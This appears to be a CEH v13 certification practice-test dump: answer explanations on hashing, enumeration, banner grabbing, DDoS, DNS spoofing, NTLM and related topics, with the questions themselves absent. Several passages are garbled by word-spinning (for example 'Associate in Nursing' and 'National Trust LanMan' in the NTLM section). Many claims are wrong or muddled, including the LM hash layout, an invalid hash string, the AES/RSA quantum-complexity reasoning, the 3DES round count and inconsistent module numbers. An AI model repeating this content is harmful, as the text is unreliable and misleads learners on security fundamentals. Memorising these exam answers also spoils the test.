ECCouncil 312-50v13 Certified Ethical Hacker Exam (CEHv13) Exam Practice Test

Comprehensive and Detailed Explanation:

Cryptographic hash functions provide:

Integrity: Any change in the input changes the output hash.

Collision Resistance: It is computationally infeasible to find two inputs that produce the same hash.

This ensures data is not altered during transmission.

From CEH v13 Courseware:

Module 10: Cryptography → Hashing Functions (e.g., SHA-256, MD5)

LM hashes are split into two 16-character halves (each representing 7-character blocks). If the original password is less than 8 characters, the second half of the LM hash will always be a constant:

"AAD3B435B51404EE"

This known value is used to pad the second half of the password, and it signals that the original password was 7 characters or fewer.

In the options:

B. 44EFCE164AB921CQAAD3B435B51404EE ← ends with AAD3B435B51404EE → < 8 chars

E. B757BF5C0D87772FAAD3B435B51404EE ← also ends with AAD3B435B51404EE → < 8 chars

From CEH v13 Official Courseware:

Module 6: Malware Threats → LM Hash Weaknesses

In CEH v13 Module 14: Cryptography, CAST-128 is defined as a symmetric block cipher based on a Feistel structure with:

Block size of 64 bits

12 or 16 rounds, depending on key size

Uses 8×32-bit S-boxes with complex structures (including bent functions)

Operates with modular addition/subtraction, XOR, key-dependent rotations, and masking keys (Km) and rotation keys (Kr)

All features described in the scenario match the CAST-128 algorithm.

Option Clarification:

B. AES: Operates on 128-bit blocks, uses Substitution-Permutation Network (SPN), not Feistel.

C. GOST: Russian block cipher, also Feistel-based, but structure and key use differ.

D. DES: Feistel cipher with 64-bit block size, but uses 16 rounds and simpler S-boxes.

Correct answer is A. CAST-128

WS-Address provides additional routing information in the SOAP header to support asynchronous communication. This technique allows the transmission of web service requests and response messages using different TCP connections

https://www.google.com/search?client=firefox-b-d &q=WS-Address+spoofing

CEH V11 Module 14 Page 1896

SMTP enumeration involves probing a mail server to gather information about users and configurations. Two important SMTP commands used in enumeration are:

VRFY: Verifies whether a particular email address or user ID exists on the mail server.

EXPN: Reveals the actual addresses behind a mailing list or alias.

These commands allow attackers or penetration testers to enumerate valid user accounts or group memberships, which can later be targeted for phishing, spam, or brute-force attacks.

Incorrect Options:

B. Daily outgoing message limits are not typically disclosed via SMTP.

C. RCPT TO is used to designate a message recipient, but it doesn't enumerate open ports.

D. Mail proxy addresses are not revealed directly via SMTP enumeration.

Reference – CEH v13 Official Courseware:

Module 04: Enumeration

Section: “SMTP Enumeration Techniques”

Tool Reference: smtp-user-enum, Netcat

===========

In CEH v13 Module 03: Scanning Networks, banner grabbing is defined as a technique used during reconnaissance to capture service banners that provide information about:

Web server version

Operating system

Service details

In This Case:

The engineer used Netcat to connect to port 80 (HTTP).

The response reveals the web server software (Microsoft-IIS/6), which is typical of a banner returned in the server's HTTP response headers.

This technique helps identify vulnerable versions of services.

Other Options:

B. SQL injection: Involves sending SQL payloads — unrelated here.

C. Whois query: Provides domain registration info — unrelated.

D. Cross-site scripting: Requires injecting scripts into a web app — not relevant here.

In CEH v13 Module 10 & 12: Vulnerability Analysis and Web Hacking, Netsparker is introduced as a leading automated web vulnerability scanner capable of detecting:

SQL Injection

Cross-site Scripting (XSS)

Local File Inclusion (LFI)

Misconfigured services

Authentication issues

It performs:

Crawling, attack simulation, and detailed reporting.

Ideal for automated assessment of web servers and applications.

Option Clarification:

A. Infoga: Email information gathering tool.

B. WebCopier Pro: Used for offline website downloading.

C. Netsparker: Purpose-built web vulnerability scanner.

D. NCollector Studio: Website archiving tool, not vulnerability-focused.

In CEH v13 Module 17: Mobile and IoT Security, Advanced SMS Phishing (also known as SMiShing) is described as a technique where attackers impersonate trusted entities via SMS to:

Trick users into entering authentication codes or PINs.

Deliver malicious payloads or alter device configurations.

Simulate OTA (Over-the-Air) provisioning messages.

In this case:

The attacker sends a fake OTA setup message asking for a PIN.

Once Ben enters the PIN, the device's configuration is hijacked.

Why Others Are Incorrect:

B. Bypass SSL pinning: Relates to mobile app reverse engineering and traffic interception.

C. Phishing: General term; SMS-specific variant is more accurate here.

D. Tap ‘n ghost: A touch screen manipulation attack, unrelated to messaging.

Correct answer is A. Advanced SMS phishing.

Hashing algorithms are specifically designed to ensure data integrity. A hash function takes an input and returns a fixed-length string, called a hash or message digest. Even a small change in the input results in a completely different hash, making it useful for detecting tampering.

Common hashing algorithms include:

MD5 (now obsolete for secure uses)

SHA-1, SHA-2, SHA-3

HMAC (Hashed Message Authentication Code)

From CEH v13 Courseware:

Module 20: Cryptography

Topic: Hash Functions and Data Integrity

CEH v13 Study Guide states:

“Hashing algorithms provide integrity by generating a unique digital fingerprint of data. Any alteration in the message content will result in a different hash value, indicating that the integrity has been compromised.”

Incorrect Options:

A: Symmetric algorithms provide confidentiality.

B: Asymmetric algorithms provide confidentiality and authentication.

D: "Integrity algorithms" is not a formal cryptographic term.

Email spoofing is the fabrication of an email header in the hopes of duping the recipient into thinking the email originated from someone or somewhere other than the intended source. Because core email protocols do not have a built-in method of authentication, it is common for spam and phishing emails to use said spoofing to trick the recipient into trusting the origin of the message.

The ultimate goal of email spoofing is to get recipients to open, and possibly even respond to, a solicitation. Although the spoofed messages are usually just a nuisance requiring little action besides removal, the more malicious varieties can cause significant problems and sometimes pose a real security threat.

==================================================================

In CEH v13 Module 02: Footprinting and Reconnaissance, and Module 03: Scanning Networks, several tools and techniques are introduced for analyzing public IP addresses when investigating a security alert.

Let’s evaluate the options:

A. DNS: Domain Name System (DNS) is essential in mapping IPs to domains. Reverse DNS lookups can reveal if the IP is associated with a malicious domain, and forward lookups can confirm legitimacy.

B. Whois: WHOIS records are crucial for identifying IP ownership, registration data, and abuse contacts. It helps assess if the IP belongs to a known threat actor or suspicious hosting provider.

C. Geolocation: Helps you understand where the IP is physically located. If the IP is in a country known for cybercrime or doesn’t match your user's location, it raises red flags.

D. ARP (Address Resolution Protocol): ❌ ARP is local to Layer 2 and works only within a LAN (Local Area Network). ARP cannot resolve or analyze public IP addresses which operate in Layer 3 of the OSI model.

Thus, ARP is the least relevant when analyzing a public IP address, as it deals with MAC-to-IP mapping only in local environments.

The scenario describes an API vulnerability where unauthorized users are able to view, modify, or delete sensitive data by interacting with API objects. This indicates a failure in access control—specifically, a lack of Attribute-Based Access Control (ABAC) validation.

Attribute-Based Access Control (ABAC):

ABAC is an advanced access control model that evaluates access permissions based on attributes of the user, the resource, and the environment (e.g., user role, data sensitivity, location, etc.).

When ABAC is not properly implemented ("No ABAC validation"), APIs may allow users to access or manipulate objects they shouldn't have access to.

In APIs, this typically results in vulnerabilities like Insecure Direct Object Reference (IDOR), where users can tamper with object identifiers (IDs) to access or alter data that doesn’t belong to them.

This is one of the top risks highlighted by the OWASP API Security Top 10 (e.g., Broken Object Level Authorization).

Incorrect Options:

A. Code injection refers to injecting malicious code (e.g., SQLi, XSS), not improper access control.

B. Improper use of CORS (Cross-Origin Resource Sharing) may lead to unauthorized data exposure but doesn’t describe unauthorized object access in an API.

D. Business logic flaws relate to weaknesses in application workflows and rules, not direct access control failures.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: "API Security Threats"

Subsection: "Access Control Failures in APIs (IDOR, BOLA, ABAC-related flaws)"

OWASP API Security Top 10: 2023 – A1: Broken Object Level Authorization

CEH iLabs and CEH Engage also demonstrate API-based attack vectors exploiting access control weaknesses.

Types of Vulnerability Assessment - External Assessment External assessment examines the network from a hacker’s point of view to identify exploits and vulnerabilities accessible to the outside world. These types of assessments use external devices such as firewalls, routers, and servers. An external assessment estimates the threat of network security attacks from outside the organization. It determines the level of security of the external network and firewall. (P.527/511)

External assessment examines the network from a hacker’s point of view to identify exploits and vulnerabilities accessible to the outside world. These types of assessments use external devices such as firewalls, routers, and servers. An external assessment estimates the threat of network security attacks from outside the organization. It determines the level of security of the external network and firewall.

The following are some of the possible steps in performing an external assessment:

o Determine a set of rules for firewall and router configurations for the external network

o Check whether the external server devices and network devices are mapped o Identify open ports and related services on the external network o Examine the patch levels on the server and external network devices o Review detection systems such as IDS, firewalls, and application-layer protection systems

o Get information on DNS zones

o Scan the external network through a variety of proprietary tools available on the Internet

o Examine Web applications such as e-commerce and shopping cart software for vulnerabilities

This phase having the hacker uses different techniques and tools to realize maximum data from the system. they’re –

• Password cracking – Methods like Bruteforce, dictionary attack, rule-based attack, rainbow table are used. Bruteforce is trying all combinations of the password. Dictionary attack is trying an inventory of meaningful words until the password matches. Rainbow table takes the hash value of the password and compares with pre-computed hash values until a match is discovered.

• Password attacks – Passive attacks like wire sniffing, replay attack. Active online attack like Trojans, keyloggers, hash injection, phishing. Offline attacks like pre-computed hash, distributed network and rainbow. Non electronic attack like shoulder surfing, social engineering and dumpster diving.

In the context of security testing, test automation plays a critical role in improving the speed and consistency of testing activities. However, it cannot entirely replace manual testing because certain security vulnerabilities—especially logic flaws or issues with session management—often require human intuition and contextual understanding.

According to CEH v13 Official Courseware – Module 05 (Vulnerability Analysis), and confirmed in the CEH v13 Study Guide, automated testing is best suited for:

Repetitive benchmark tests

Regression testing

Scanning for known vulnerabilities

Ensuring consistency across environments

However, manual testing is still essential for:

Business logic testing

Security misconfiguration identification

Discovering zero-day flaws

Data encryption with AES-128 is likely to provide the best balance of security and performance in this scenario. This option works as follows:

AES-128 is a symmetric encryption algorithm that uses a 128-bit key to encrypt and decrypt data. AES-128 is one of the most widely used and trusted encryption algorithms, and it is considered secure against classical and quantum attacks, as long as the key is not compromised. AES-128 has a time complexity of O(n), which means that the encryption and decryption time is proportional to the size of the data. AES-128 is also fast and efficient, as it can process 16 bytes of data in each round, and it requires only 10 rounds to complete the encryption or decryption12.

RSA-4000 is an asymmetric encryption algorithm that uses a 4000-bit key pair to encrypt and decrypt data. RSA-4000 is used for key exchange, which means that it is used to securely share the AES-128 key between the sender and the receiver. RSA-4000 has a time complexity of O(n*2), which means that the key generation, encryption, and decryption time is proportional to the square of the size of the key. RSA-4000 is also slow and resource-intensive, as it involves large number arithmetic and modular exponentiation operations. RSA-4000 is considered secure against classical attacks, but it is vulnerable to quantum attacks, especially if the attacker has access to a quantum computer with sufficient resources to run Shor’s algorithm, which can factor large numbers in polynomial time34.

The attacker’s quantum algorithm has a time complexity of O((log n)*2), which means that the cracking time is proportional to the square of the logarithm of the size of the key. This implies that the attacker can crack RSA-4000 much faster than a classical computer, as the logarithm function grows much slower than the linear or quadratic function. For example, if a classical computer takes 10^12 years to crack RSA-4000, a quantum computer with the attacker’s algorithm could do it in about 10^4 years, which is still a long time, but not impossible5.

Therefore, data encryption with AES-128 is likely to provide the best balance of security and performance in this scenario, because:

AES-128 is secure and fast, and it can encrypt large amounts of data efficiently.

RSA-4000 is slow and vulnerable, but it is only used for key exchange, which involves a small amount of data and a one-time operation.

The attacker’s quantum algorithm is powerful, but it is not practical, as it requires a quantum computer with a large number of qubits and a long coherence time, which are not available yet.

The other options are not as balanced as option C for the following reasons:

A. Data encryption with 3DES using a 168-bit key: This option offers high security but slower performance due to 3DES’s inherent inefficiencies. 3DES is a symmetric encryption algorithm that uses a 168-bit key to encrypt and decrypt data. 3DES is a variant of DES, which is an older and weaker encryption algorithm that uses a 56-bit key. 3DES applies DES three times with different keys to increase the security, but this also increases the complexity and reduces the speed. 3DES has a time complexity of O(n), but it is much slower than AES, as it can process only 8 bytes of data in each round, and it requires 48 rounds to complete the encryption or decryption. 3DES is considered secure against classical and quantum attacks, but it is not recommended for new applications, as it is outdated and inefficient67.

B. Data encryption with Blowfish using a 448-bit key: This option offers high security but potential compatibility issues due to Blowfish’s less widespread use. Blowfish is a symmetric encryption algorithm that uses a variable key size, up to 448 bits, to encrypt and decrypt data. Blowfish is fast and secure, and it has a time complexity of O(n), as it can process 8 bytes of data in each round, and it requires 16 rounds to complete the encryption or decryption. Blowfish is considered secure against classical and quantum attacks, but it is not as popular or standardized as AES, and it may have compatibility issues with some applications or platforms89.

D. Data encryption with AES-256: This option provides high security with better performance than 3DES, but not as fast as other AES key sizes. AES-256 is a symmetric encryption algorithm that uses a 256-bit key to encrypt and decrypt data. AES-256 is a variant of AES, which is the most widely used and trusted encryption algorithm. AES-256 has a time complexity of O(n), and it can process 16 bytes of data in each round, but it requires 14 rounds to complete the encryption or decryption, which is more than AES-128 or AES-192. AES-256 is considered secure against classical and quantum attacks, but it is not as fast as other AES key sizes, and it may not be necessary for most applications, as AES-128 or AES-192 are already secure enough12.

A powerful and often the most effective cryptanalysis method in which the attack is directed at the most vulnerable link in the cryptosystem - the person. In this attack, the cryptanalyst uses blackmail, threats, torture, extortion, bribery, etc. This method's main advantage is the decryption time's fundamental independence from the volume of secret information, the length of the key, and the cipher's mathematical strength.

The method can reduce the time to guess a password, for example, for AES, to an acceptable level; however, it requires special authorization from the relevant regulatory authorities. Therefore, it is outside the scope of this course and is not considered in its practical part.

In CEH v13 Module 16: Cloud Computing and Container Security, Cloudborne attacks are described as threats specific to bare-metal cloud infrastructure.

Characteristics of a Cloudborne Attack:

Targets firmware-level vulnerabilities in reused physical servers.

Malware or backdoors can persist even after VM or OS reinstallation.

Can lead to compromise of new tenants or clients once servers are reallocated.

First highlighted in Project X by Eclypsium.

Option Clarification:

A. MITC: Exploits synchronization in cloud storage, not firmware.

B. Cryptojacking: Mining cryptocurrency using cloud resources.

C. Cloudborne attack: Correct — targets firmware on bare-metal cloud servers.

D. Metadata spoofing: Exploits cloud instance metadata services, unrelated to firmware.

According to CEH v13 Module 04: Enumeration and Module 08: Sniffing, packet sniffers such as Wireshark, tcpdump, and EtherApe are designed to capture and analyze network traffic at the data link (Layer 2) and network (Layer 3) layers of the OSI model.

At Layer 2 (Data Link), sniffers capture Ethernet frames, including MAC addresses and frame type.

At Layer 3 (Network), sniffers interpret IP headers, IP addresses, and transport layer protocols (TCP, UDP).

They do not operate at Layer 1 (Physical) as they do not deal with raw electrical signals.

Packet sniffers also do not manipulate traffic but passively monitor and capture packets that traverse the network.

Therefore, the correct statement is:

Packet Sniffers operate on both Layer 2 & Layer 3 of the OSI model.

Option Analysis:

A. Layer 1: ❌ Incorrect. Layer 1 is the physical layer (electrical, optical signals).

B. Layer 2: ❌ Partially correct but incomplete.

C. Both Layer 2 & Layer 3: Correct. Full coverage of packet sniffing capabilities.

D. Layer 3: ❌ Partially correct but incomplete.

Reference from CEH v13 Courseware:

Module 08 – Sniffing, Section: How Packet Sniffers Work

CEH iLabs: Capturing Ethernet Frames and IP Packets Using Wireshark

OSI Model Mapping in CEH Official eBook

Adversaries could decide to build an possible or file difficult to find or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. this is often common behavior which will be used across totally different platforms and therefore the network to evade defenses.

Payloads may be compressed, archived, or encrypted so as to avoid detection. These payloads may be used throughout Initial Access or later to mitigate detection. typically a user’s action could also be needed to open and Deobfuscate/Decode Files or info for User Execution. The user can also be needed to input a parole to open a parole protected compressed/encrypted file that was provided by the mortal. Adversaries can also used compressed or archived scripts, like JavaScript.

Portions of files can even be encoded to cover the plain-text strings that will otherwise facilitate defenders with discovery. Payloads can also be split into separate, ostensibly benign files that solely reveal malicious practicality once reassembled.

Adversaries can also modify commands dead from payloads or directly via a Command and Scripting Interpreter. surroundings variables, aliases, characters, and different platform/language specific linguistics may be wont to evade signature based mostly detections and application management mechanisms.

ARP Spoofing Attack ARP packets can be forged to send data to the attacker’s machine.Attackers flood a target computer’s ARP cache with forged entries, which is also known as poisoning. (P.1143/1127)

Footprinting techniques are used to collect basic information about the target IoT and OT platforms to exploit them. Information collected through footprinting techniques ncludes IP address, hostname, ISP, device location, banner of the target IoT device, FCC ID information, certification granted to the device, etc. pg. 5052 ECHv11 manual

https://en.wikipedia.org/wiki/FCC_mark

An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. For legal sale of wireless deices in the US, manufacturers must:

· Have the device evaluated by an independent lab to ensure it conforms to FCC standards

· Provide documentation to the FCC of the lab results

· Provide User Manuals, Documentation, and Photos relating to the device

· Digitally or physically label the device with the unique identifier provided by the FCC (upon approved application)

The FCC gets its authourity from Title 47 of the Code of Federal Regulations (47 CFR). FCC IDs are required for all wireless emitting devices sold in the USA. By searching an FCC ID, you can find details on the wireless operating frequency (including strength), photos of the device, user manuals for the device, and SAR reports on the wireless emissions

Zone transfers (AXFR) are DNS operations that replicate zone data from a primary server to a secondary server. These can be abused during DNS enumeration if improperly secured.

CEH v13 recommends using the following tools for attempting or testing zone transfers:

A. NSLookup – supports AXFR using set type=any or set type=AXFR

C. Dig – dig @ns.example.com example.com AXFR

D. Sam Spade – GUI tool capable of DNS zone transfer

E. Host – command-line tool used for DNS lookups and AXFR

Incorrect Tools:

B. Finger – used for user enumeration, not DNS

F. Netcat – general-purpose networking tool, not specific to DNS

G. Neotrace – used for traceroute/path tracing, not DNS

The TTL (Time-To-Live) and TCP window size are commonly used values for passive OS fingerprinting. Different operating systems set default values for these fields in IP and TCP headers.

From CEH v13 Official Courseware and tools like Nmap and Netcraft:

A TTL of 64 and TCP window size of 5840 is a strong indicator of a Linux-based operating system.

This combination is one of the signature responses used in tools such as Nmap and p0f to fingerprint OS remotely.

Here’s a general reference table:

OS

Default TTL

TCP Window Size

Windows

128

8192/65535

Linux

64

5840

Solaris

255

8760

Mac OS

64

65535

Therefore, TTL: 64 + Window Size: 5840 = Linux OS

Incorrect Options:

A. Solaris typically has a TTL of 255 and a different window size.

B. Windows defaults to TTL 128.

C. Mac OS uses TTL 64 but has a window size of 65535.

Reference – CEH v13 Official Courseware:

Module 03: Scanning Networks

Section: “OS Detection Using TTL and TCP Window Size”

Tools: Nmap OS Fingerprinting, Xprobe2

CEH iLab: OS Fingerprinting with TCP/IP Stack Behavior

===========

In a man-in-the-middle (MITM) attack, an attacker intercepts communication between two parties and can read, alter, or inject data without either party knowing. Susan's actions — intercepting and modifying her boss's session data before relaying it to the server — is the classic MITM pattern.

From CEH v13 Official Courseware:

Module 8: Sniffing

Module 11: Session Hijacking

CEH v13 Study Guide states:

“In a MITM attack, the attacker positions themselves between two communicating parties, relaying and possibly altering communications while maintaining the illusion that the parties are communicating directly.”

Incorrect Options:

A: Sniffing only involves passive listening.

B: Spoofing may involve impersonation but not necessarily interception and relay.

D: DoS is about service disruption, not data interception.

Comprehensive and Detailed Explanation:

VCloud-based (also known as Cloud-based or Cloud-assisted) antivirus leverages cloud computing to:

Offload detection and analysis to powerful remote servers

Provide real-time updates and threat intelligence

Aggregate data from multiple endpoints to improve detection

This method is efficient, especially for zero-day threats and large-scale protection.

From CEH v13 Courseware:

Module 6: Malware Threats → Modern Antivirus Technologies

Verbose failure messages are detailed error messages that reveal too much information about authentication failures. In the described scenario, the web application specifies whether the username or password is incorrect. This behavior enables attackers to:

Enumerate valid usernames by submitting random inputs and observing which error message is returned.

Use the valid usernames to conduct targeted attacks such as brute-force attempts or social engineering.

According to CEH v13:

Authentication mechanisms should provide generic error messages such as “Invalid username or password” to avoid exposing system behavior.

Verbose error messages violate the principle of "fail securely."

Incorrect Options:

A. Insecure transmission relates to credentials being sent over unencrypted channels (e.g., HTTP instead of HTTPS).

C. User impersonation involves taking on the identity of another user, not enumeration.

D. Password reset mechanisms are a different component of authentication, not mentioned in this context.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: “Authentication Bypass Techniques”

Subsection: “Enumeration via Verbose Error Messages”

===========

https://www.pcisecuritystandards.org/pci_security/maintaining_payment_security

Build and Maintain a Secure Network

1. Install and maintain a firewall configuration to protect cardholder data.

2. Do not use vendor-supplied defaults for system passwords and other security parameters.

Protect Cardholder Data

3. Protect stored cardholder data.

4. Encrypt transmission of cardholder data across open, public networks.

Maintain a Vulnerability Management Program

5. Use and regularly update anti-virus software or programs.

6. Develop and maintain secure systems and applications.

Implement Strong Access Control Measures

7. Restrict access to cardholder data by business need-to-know.

8. Assign a unique ID to each person with computer access.

9. Restrict physical access to cardholder data.

Regularly Monitor and Test Networks

10. Track and monitor all access to network resources and cardholder data.

11. Regularly test security systems and processes.

Maintain an Information Security Policy

12. Maintain a policy that addresses information security for employees and contractors.

A Multipartite Virus is designed to infect both the boot sector and executable files of a system. This makes it more complex and harder to remove than viruses that target only one area. It can spread in multiple ways and activate under different conditions depending on whether the infected file or boot sector is accessed first.

CEH v13 Official Curriculum states:

“Multipartite viruses infect both the boot sector and program files. They are difficult to remove and can reinfect the system unless both locations are cleaned simultaneously.”

Incorrect Options:

A. Polymorphic viruses change their code signatures but do not necessarily target both boot and executable areas.

B. Stealth viruses conceal their presence, often by intercepting system calls.

D. Macro viruses infect macro-enabled files, typically in Microsoft Office documents.

Reference – CEH v13 Guide:

Module 06: Malware Threats

Topic: Types of Malware – Multipartite Viruses

Scammers often impersonate legitimate organizations using free email services like @yahoo.com. "Yahoo Bank" is not a legitimate institution, and a real financial entity would use an official domain (e.g., @yahoobank.com). This is a textbook phishing/smishing attempt.

Reference – CEH v13 Official Study Guide:

Module 9: Social Engineering

Quote:

“Attackers often use free email services and impersonate authority figures to trick users. Always verify the sender’s domain and context.”

Incorrect Options:

B. Irrelevant—legitimate people may be unknown too.

C. Responding increases risk.

D. It is not from a verified organization.

===========

Banner grabbing is a technique wont to gain info about a computer system on a network and the services running on its open ports. administrators will use this to take inventory of the systems and services on their network. However, an to find will use banner grabbing so as to search out network hosts that are running versions of applications and operating systems with known exploits.

Some samples of service ports used for banner grabbing are those used by Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 severally. Tools normally used to perform banner grabbing are Telnet, nmap and Netcat.

For example, one may establish a connection to a target internet server using Netcat, then send an HTTP request. The response can usually contain info about the service running on the host:

This information may be used by an administrator to catalog this system, or by an intruder to narrow down a list of applicable exploits.

To prevent this, network administrators should restrict access to services on their networks and shut down unused or unnecessary services running on network hosts. Shodan is a search engine for banners grabbed from portscanning the Internet.

Comprehensive and Detailed Explanation:

LDAP (Lightweight Directory Access Protocol) uses a hierarchical data structure similar to a directory tree. SQL databases use a relational structure with tables, rows, and columns.

Because of its hierarchical nature:

LDAP is excellent for parent-child relationships.

It struggles with representing many-to-many or many-to-one relationships efficiently.

From CEH v13 Courseware:

Module 4: Enumeration → LDAP Basics

A Pulse Wave attack is a type of DDoS attack that uses a botnet to send high-volume traffic pulses at regular intervals, typically lasting for a few minutes each. The attacker can adjust the frequency and duration of the pulses to maximize the impact and evade detection. A Pulse Wave attack can exhaust the network resources of the target, as well as the resources of any DDoS mitigation service that the target may use. A Pulse Wave attack can also conceal the attacker’s identity, as the traffic originates from multiple sources that are part of the botnet. A Pulse Wave attack can bypass simple defensive measures, such as IP-based blocking, as the traffic can appear legitimate and vary in source IP addresses.

The other options are less effective or feasible for the attacker’s objectives. A protocol-based SYN flood attack is a type of DDoS attack that exploits the TCP handshake process by sending a large number of SYN requests to the target server, without completing the connection. This consumes the connection state tables on the server, preventing it from accepting new connections. However, a SYN flood attack can be easily detected and mitigated by using SYN cookies or firewalls. A SYN flood attack can also expose the attacker’s identity, as the source IP addresses of the SYN requests can be traced back to the attacker. An ICMP flood attack is a type of DDoS attack that sends a large number of ICMP packets, such as ping requests, to the target server, overwhelming its ICMP processing capacity. However, an ICMP flood attack from a single IP can be easily blocked by using IP-based filtering or disabling ICMP responses. An ICMP flood attack can also reveal the attacker’s identity, as the source IP address of the ICMP packets can be identified. A volumetric flood attack is a type of DDoS attack that sends a large amount of traffic to the target server, saturating its network bandwidth and preventing legitimate users from accessing it. However, a volumetric flood attack using a single compromised machine may not be sufficient to overwhelm the network bandwidth of a major online retailer, as the attacker’s machine may have limited bandwidth itself. A volumetric flood attack can also be detected and mitigated by using traffic shaping or rate limiting techniques. References:

Pulse Wave DDoS Attacks: What You Need to Know

DDoS Attack Prevention: 7 Effective Mitigation Strategies

DDoS Attack Types: Glossary of Terms

DDoS Attacks: What They Are and How to Protect Yourself

DDoS Attack Prevention: How to Protect Your Website

LAN Manager (LM) hashes are legacy password hashing methods used in older Windows systems (including Windows 2000 for backward compatibility). LM hashing works by:

Converting the password to uppercase.

Padding or truncating it to 14 characters.

Splitting it into two 7-character halves.

Using each half as a DES key to encrypt a known constant ("KGS!@#$%").

Therefore, LM hashing uses the DES (Data Encryption Standard) algorithm.

From CEH v13 Official Courseware:

Module 6: Malware Threats → Password Storage and LM Hash Structure

https://ru.wikipedia.org/wiki/DNS_spoofing

DNS spoofing is a threat that copies the legitimate server destinations to divert the domain's traffic. Ignorant these attacks, the users are redirected to malicious websites, which results in insensitive and personal data being leaked. It is a method of attack where your DNS server is tricked into saving a fake DNS entry. This will make the DNS server recall a fake site for you, thereby posing a threat to vital information stored on your server or computer.

The cache poisoning codes are often found in URLs sent through spam emails. These emails are sent to prompt users to click on the URL, which infects their computer. When the computer is poisoned, it will divert you to a fake IP address that looks like a real thing. This way, the threats are injected into your systems as well.

Different Stages of Attack of DNS Cache Poisoning:

- The attacker proceeds to send DNS queries to the DNS resolver, which forwards the Root/TLD authoritative DNS server request and awaits an answer.

- The attacker overloads the DNS with poisoned responses that contain several IP addresses of the malicious website. To be accepted by the DNS resolver, the attacker's response should match a port number and the query ID field before the DNS response. Also, the attackers can force its response to increasing their chance of success.

- If you are a legitimate user who queries this DNS resolver, you will get a poisoned response from the cache, and you will be automatically redirected to the malicious website.

A Wireless Intrusion Prevention System (WIPS) is a network device that monitors the radio spectrum for the presence of unauthorized access points (intrusion detection), and can automatically take countermeasures (intrusion prevention).

A multihomed firewall refers to a firewall with two or more network interfaces (NICs), each connected to different network segments. The purpose of a multihomed firewall is to allow filtering and segmentation of traffic between multiple network zones, such as:

External network (e.g., Internet)

Internal network (e.g., LAN)

To qualify as multihomed, the system must have at least two network interfaces. This allows it to sit between two networks and inspect/filter traffic passing through it.

Reference – CEH v13 Official Study Guide:

Module 13: Evading IDS, Firewalls, and Honeypots

Section: Firewall Architecture

Quote:

“A multihomed firewall is a system with two or more NICs connected to different networks, typically used to control traffic between internal and external networks. The minimum number of interfaces is two.”

Incorrect Options Explained:

A. 3 interfaces may be used in advanced setups (e.g., with a DMZ), but not the minimum.

B & C. 4 or 5 connections are not required unless designing more complex segmentation.

===========

In CEH v13 Module 02: Footprinting and Reconnaissance, Google advanced operators are tools for passive information gathering.

related: operator is used to find websites similar to a given domain or webpage.

This helps attackers discover alternate domains, competitors, or similar content that may be vulnerable or poorly secured.

Example:

related:example.com

Will return a list of sites Google deems related to example.com.

Option Clarification:

A. inurl: – Searches for a keyword in the URL.

B. related: – Correct – Finds similar or related websites.

C. info: – Provides Google’s cached and indexed data about a URL.

D. site: – Restricts search to a specific domain or site.

To secure DNS infrastructure, best practices include:

B. Harden DNS Servers: Disable unused services, apply patches, implement secure configurations.

C. Use Split-Horizon DNS: Present different DNS data to internal vs. external users to prevent data leakage.

D. Restrict Zone Transfers: Prevent unauthorized replication of zone data using IP-based access control or TSIG.

E. Subnet Diversity: Place DNS servers on different subnets or networks to enhance resilience.

From CEH v13 Official Courseware:

Module 3: Scanning Networks

Module 20: Cryptography

Incorrect Option:

A: Hosting DNS on multi-purpose servers increases the attack surface and violates security best practices.

If SNMP access is restricted to specific IP addresses (e.g., 192.168.1.0/24), you can bypass access controls by:

Spoofing the source IP to fall within that allowed range.

Using a SNMP set request to instruct the device (e.g., to copy its configuration to a TFTP server).

This is a classic SNMP spoofing attack.

From CEH v13 Courseware:

Module 4: Enumeration → SNMP Enumeration Attacks

In a Windows network, nongovernmental organization (New Technology) local area network Manager (NTLM) could be a suite of Microsoft security protocols supposed to produce authentication, integrity, and confidentiality to users.NTLM is that the successor to the authentication protocol in Microsoft local area network Manager (LANMAN), Associate in Nursing older Microsoft product. The NTLM protocol suite is enforced in an exceedingly Security Support supplier, which mixes the local area network Manager authentication protocol, NTLMv1, NTLMv2 and NTLM2 Session protocols in an exceedingly single package. whether or not these protocols area unit used or will be used on a system is ruled by cluster Policy settings, that totally different|completely different} versions of Windows have different default settings. NTLM passwords area unit thought-about weak as a result of they will be brute-forced very simply with fashionable hardware.

NTLM could be a challenge-response authentication protocol that uses 3 messages to authenticate a consumer in an exceedingly affiliation orientating setting (connectionless is similar), and a fourth extra message if integrity is desired.

First, the consumer establishes a network path to the server and sends a NEGOTIATE_MESSAGE advertising its capabilities.

Next, the server responds with CHALLENGE_MESSAGE that is employed to determine the identity of the consumer.

Finally, the consumer responds to the challenge with Associate in Nursing AUTHENTICATE_MESSAGE.

The NTLM protocol uses one or each of 2 hashed word values, each of that are keep on the server (or domain controller), and that through a scarcity of seasoning area unit word equivalent, that means that if you grab the hash price from the server, you’ll evidence while not knowing the particular word. the 2 area unit the lm Hash (a DES-based operate applied to the primary fourteen chars of the word born-again to the standard eight bit laptop charset for the language), and also the nt Hash (MD4 of the insufficient endian UTF-16 Unicode password). each hash values area unit sixteen bytes (128 bits) every.

The NTLM protocol additionally uses one among 2 a method functions, looking on the NTLM version. National Trust LanMan and NTLM version one use the DES primarily based LanMan a method operate (LMOWF), whereas National TrustLMv2 uses the NT MD4 primarily based a method operate (NTOWF).

A thin Whois model is a type of data model that is used by some domain registrars for storing and looking up Whois information. In a thin Whois model, the registrar only stores the basic information about the domain, such as the domain name, the registrar name, the name servers, and the registration and expiration dates. The rest of the information, such as the contact details of the domain owner, the administrative contact, and the technical contact, is stored by the registry that manages the top-level domain (TLD) of the domain. For example, the registry for .com and .net domains is Verisign, and the registry for .org domains is Public Interest Registry. When a Whois lookup is performed on a domain that uses a thin Whois model, the registrar’s Whois server only returns the basic information and refers the query to the registry’s Whois server for the complete information1.

As a hacker, if you are unable to gather complete Whois information from the registrar for a particular set of data, it might be because the domain’s registrar is using a thin Whois model and the registry’s Whois server is not responding or providing the information. This could be due to various reasons, such as network issues, server errors, rate limits, privacy policies, or legal restrictions. Therefore, the probable data model being utilized by the domain’s registrar for storing and looking up Whois information is a thin Whois model working correctly.

